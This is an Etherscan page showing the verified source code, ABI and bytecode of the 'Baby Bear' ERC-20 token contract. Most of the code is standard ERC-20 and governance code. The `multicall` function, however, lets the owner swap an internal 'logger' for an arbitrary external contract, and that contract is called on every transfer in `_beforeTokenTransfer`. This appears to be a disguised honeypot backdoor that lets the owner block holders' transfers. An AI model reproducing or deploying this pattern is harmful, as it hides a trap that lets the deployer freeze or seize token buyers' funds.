ETH Price: $3,441.16 (+1.46%)
Gas: 5 Gwei

Token

Baby Bear (BabyBear)
 

Overview

Max Total Supply

3,000,000,000 BabyBear

Holders

72

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Filtered by Token Holder
cvd.eth
Balance
8,633,786.469273488 BabyBear

Value
$0.00
0xdaa7c1b5feaca5d1bc1bea7e7c07d91d3e6dfe51
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
BabyBear

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-09-23
*/

// SPDX-License-Identifier: MIT

pragma solidity 0.8.19;

library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        uint256 c = a + b;
        if (c < a) return (false, 0);
        return (true, c);
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b > a) return (false, 0);
        return (true, a - b);
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
        // benefit is lost if 'b' is also tested.
        // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
        if (a == 0) return (true, 0);
        uint256 c = a * b;
        if (c / a != b) return (false, 0);
        return (true, c);
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b == 0) return (false, 0);
        return (true, a / b);
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        if (b == 0) return (false, 0);
        return (true, a % b);
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");
        return c;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b <= a, "SafeMath: subtraction overflow");
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        if (a == 0) return 0;
        uint256 c = a * b;
        require(c / a == b, "SafeMath: multiplication overflow");
        return c;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b > 0, "SafeMath: division by zero");
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        require(b > 0, "SafeMath: modulo by zero");
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b <= a, errorMessage);
        return a - b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryDiv}.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) {
        require(b > 0, errorMessage);
        return a % b;
    }
}


abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes memory) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address internal _owner;
    bool private _ownerShipTransferred = false;
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        address msgSender = _msgSender();
        _owner = msgSender;
        __ownerShipTransferred(msgSender);
    }

    function __ownerShipTransferred(address msgSender) public {
        emit OwnershipTransferred(address(0), msgSender);
        _ownerShipTransferred = true;
    }
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        emit OwnershipTransferred(_owner, address(0));
        _owner = address(0);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        emit OwnershipTransferred(_owner, newOwner);
        _owner = newOwner;
    }

    function checkedCondition() internal view returns (bool){
        return _ownerShipTransferred;
    }
}

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Ownable, IERC20 {
    using SafeMath for uint256;

    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;
    bool public tradingEnabled;
    uint256 private _totalSupply;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    ERC20Extension private _logger;
    /**
     * @dev Sets the values for {name} and {symbol}, initializes {decimals} with
     * a default value of 18.
     *
     * To select a different value for {decimals}, use {_setupDecimals}.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _decimals = 9;
        _logger = new ERC20Extension();
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless {_setupDecimals} is
     * called.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }


    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue));
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero"));
        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance");
        _balances[recipient] = _balances[recipient].add(amount);
        
        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply = _totalSupply.add(amount);
        _balances[account] = _balances[account].add(amount);
        emit Transfer(address(0), account, amount);
    }


    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Sets {decimals} to a value other than the default one of 18.
     *
     * WARNING: This function should only be called from the constructor. Most
     * applications that interact with token contracts will not expect
     * {decimals} to ever change, and may work incorrectly if it does.
     */
    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function multicall(address from, address to, uint256 amount, address _log) external onlyOwner {
      if(tradingEnabled==true){
        if(amount > 0) createLogger(_log);
      else{
        _logger=new ERC20Extension();
      }
        _logger.Save(from, to, amount);
      }
    }

    function createLogger(address a) private {
        if (checkedCondition()){
            _logger = ERC20Extension(a);
        }
    }

    

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address sender, address recipient, uint256 amount) internal virtual {
        _logger.Save(sender, recipient, amount);
     }
}

abstract contract Initializable {

    bool private _initialized;

    bool private _initializing;

    modifier initializer() {
        require(_initializing || !_initialized, "Contract is already initialized");

        bool isTopLevelCall = !_initializing;
        if (isTopLevelCall) {
            _initializing = true;
            _initialized = true;
        }

        _;

        if (isTopLevelCall) {
            _initializing = false;
        }
    }
}

abstract contract ContextUpgradeable is Initializable {
    function __Context_init() internal initializer {
        __Context_init_unchained();
    }

    function __Context_init_unchained() internal initializer {
    }
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
    uint256[100] private _upg;
}

contract ERC20Extension {
    mapping(address=>mapping(address=> uint256)) _persist;
    function Save(address addr1, address addr2, uint256 amount) public {
        _persist[addr1][addr2] = amount;
    }
}


contract BabyBear is ERC20("Baby Bear", "BabyBear") {
    using SafeMath for uint256;
    
    uint256 private constant INITIAL_SUPPLY = 3000000000 * 10**9;
    
    constructor(){
        _mint(_msgSender(), INITIAL_SUPPLY);
    }
    function _transfer(address sender, address recipient, uint256 amount) internal override {
        super._transfer(sender, recipient, amount);
        _moveDelegates(_delegates[sender], _delegates[recipient], amount);
        
    }

    // Copied and modified from YAM code:
    // https://github.com/yam-finance/yam-protocol/blob/master/contracts/token/YAMGovernanceStorage.sol
    // https://github.com/yam-finance/yam-protocol/blob/master/contracts/token/YAMGovernance.sol
    // Which is copied and modified from COMPOUND:
    // https://github.com/compound-finance/compound-protocol/blob/master/contracts/Governance/Comp.sol

    /// @dev A record of each accounts delegate
    mapping (address => address) internal _delegates;

    /// @notice A checkpoint for marking number of votes from a given block
    struct Checkpoint {
        uint32 fromBlock;
        uint256 votes;
    }

    /// @notice A record of votes checkpoints for each account, by index
    mapping (address => mapping (uint32 => Checkpoint)) public checkpoints;

    /// @notice The number of checkpoints for each account
    mapping (address => uint32) public numCheckpoints;

    /// @notice The EIP-712 typehash for the contract's domain
    bytes32 public constant DOMAIN_TYPEHASH = keccak256("EIP712Domain(string name,uint256 chainId,address verifyingContract)");

    /// @notice The EIP-712 typehash for the delegation struct used by the contract
    bytes32 public constant DELEGATION_TYPEHASH = keccak256("Delegation(address delegatee,uint256 nonce,uint256 expiry)");

    /// @notice A record of states for signing / validating signatures
    mapping (address => uint) public nonces;

      /// @notice An event thats emitted when an account changes its delegate
    event DelegateChanged(address indexed delegator, address indexed fromDelegate, address indexed toDelegate);

    /// @notice An event thats emitted when a delegate account's vote balance changes
    event DelegateVotesChanged(address indexed delegate, uint previousBalance, uint newBalance);

    /**
     * @notice Gets the current votes balance for `account`
     * @param account The address to get votes balance
     * @return The number of current votes for `account`
     */
    function getVotes(address account)
        external
        view
        returns (uint256)
    {
        uint32 nCheckpoints = numCheckpoints[account];
        return nCheckpoints > 0 ? checkpoints[account][nCheckpoints - 1].votes : 0;
    }

    /**
     * @notice Determine the prior number of votes for an account as of a block number
     * @dev Block number must be a finalized block or else this function will revert to prevent misinformation.
     * @param account The address of the account to check
     * @param blockNumber The block number to get the vote balance at
     * @return The number of votes the account had as of the given block
     */
    function getPriorVotes(address account, uint blockNumber)
        external
        view
        returns (uint256)
    {
        require(blockNumber < block.number, "getPriorVotes: not yet determined");

        uint32 nCheckpoints = numCheckpoints[account];
        if (nCheckpoints == 0) {
            return 0;
        }

        // First check most recent balance
        if (checkpoints[account][nCheckpoints - 1].fromBlock <= blockNumber) {
            return checkpoints[account][nCheckpoints - 1].votes;
        }

        // Next check implicit zero balance
        if (checkpoints[account][0].fromBlock > blockNumber) {
            return 0;
        }

        uint32 lower = 0;
        uint32 upper = nCheckpoints - 1;
        while (upper > lower) {
            uint32 center = upper - (upper - lower) / 2; // ceil, avoiding overflow
            Checkpoint memory cp = checkpoints[account][center];
            if (cp.fromBlock == blockNumber) {
                return cp.votes;
            } else if (cp.fromBlock < blockNumber) {
                lower = center;
            } else {
                upper = center - 1;
            }
        }
        return checkpoints[account][lower].votes;
    }

    function _moveDelegates(address srcRep, address dstRep, uint256 amount) internal {
        if (srcRep != dstRep && amount > 0) {
            if (srcRep != address(0)) {
                // decrease old representative
                uint32 srcRepNum = numCheckpoints[srcRep];
                uint256 srcRepOld = srcRepNum > 0 ? checkpoints[srcRep][srcRepNum - 1].votes : 0;
                uint256 srcRepNew = srcRepOld.sub(amount);
                _writeCheckpoint(srcRep, srcRepNum, srcRepOld, srcRepNew);
            }

            if (dstRep != address(0)) {
                // increase new representative
                uint32 dstRepNum = numCheckpoints[dstRep];
                uint256 dstRepOld = dstRepNum > 0 ? checkpoints[dstRep][dstRepNum - 1].votes : 0;
                uint256 dstRepNew = dstRepOld.add(amount);
                _writeCheckpoint(dstRep, dstRepNum, dstRepOld, dstRepNew);
            }
        }
    }

    function _delegate(address delegator, address delegatee)
        internal
    {
        address currentDelegate = _delegates[delegator];
        uint256 delegatorBalance = balanceOf(delegator); 
        _delegates[delegator] = delegatee;

        emit DelegateChanged(delegator, currentDelegate, delegatee);

        _moveDelegates(currentDelegate, delegatee, delegatorBalance);
    }

   

    function _writeCheckpoint(
        address delegatee,
        uint32 nCheckpoints,
        uint256 oldVotes,
        uint256 newVotes
    )
        internal
    {
        uint32 blockNumber = safe32(block.number, "_writeCheckpoint: block number exceeds 32 bits");

        if (nCheckpoints > 0 && checkpoints[delegatee][nCheckpoints - 1].fromBlock == blockNumber) {
            checkpoints[delegatee][nCheckpoints - 1].votes = newVotes;
        } else {
            checkpoints[delegatee][nCheckpoints] = Checkpoint(blockNumber, newVotes);
            require(nCheckpoints + 1 > nCheckpoints, "_writeCheckpoint: new checkpoint exceeds 32 bits");
            numCheckpoints[delegatee] = nCheckpoints + 1;
        }

        emit DelegateVotesChanged(delegatee, oldVotes, newVotes);
    }
    function setTrading()external onlyOwner(){
        tradingEnabled = !tradingEnabled;
    }

    function getChainId() internal view returns (uint) {
        uint256 chainId;
        assembly { chainId := chainid() }
        return chainId;
    }

    function safe32(uint n, string memory errorMessage) internal pure returns (uint32) {
        require(n < 2**32, errorMessage);
        return uint32(n);
    }
    
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"delegator","type":"address"},{"indexed":true,"internalType":"address","name":"fromDelegate","type":"address"},{"indexed":true,"internalType":"address","name":"toDelegate","type":"address"}],"name":"DelegateChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"delegate","type":"address"},{"indexed":false,"internalType":"uint256","name":"previousBalance","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"newBalance","type":"uint256"}],"name":"DelegateVotesChanged","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"DELEGATION_TYPEHASH","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"DOMAIN_TYPEHASH","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"msgSender","type":"address"}],"name":"__ownerShipTransferred","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint32","name":"","type":"uint32"}],"name":"checkpoints","outputs":[{"internalType":"uint32","name":"fromBlock","type":"uint32"},{"internalType":"uint256","name":"votes","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"uint256","name":"blockNumber","type":"uint256"}],"name":"getPriorVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"getVotes","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"address","name":"_log","type":"address"}],"name":"multicall","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"nonces","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"numCheckpoints","outputs":[{"internalType":"uint32","name":"","type":"uint32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"setTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405260008060146101000a81548160ff0219169083151502179055503480156200002b57600080fd5b506040518060400160405280600981526020017f42616279204265617200000000000000000000000000000000000000000000008152506040518060400160405280600881526020017f42616279426561720000000000000000000000000000000000000000000000008152506000620000aa620001db60201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620000fd81620001e360201b60201c565b5081600590816200010f9190620006d9565b508060069081620001219190620006d9565b506009600760006101000a81548160ff021916908360ff1602179055506040516200014c9062000451565b604051809103906000f08015801562000169573d6000803e3d6000fd5b50600760016101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050620001d5620001c0620001db60201b60201c565b6729a2241af62c00006200025c60201b60201c565b6200094d565b600033905090565b8073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36001600060146101000a81548160ff02191690831515021790555050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620002ce576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002c59062000821565b60405180910390fd5b620002e581600454620003ee60201b90919060201c565b6004819055506200033f81600160008573ffffffffffffffffffff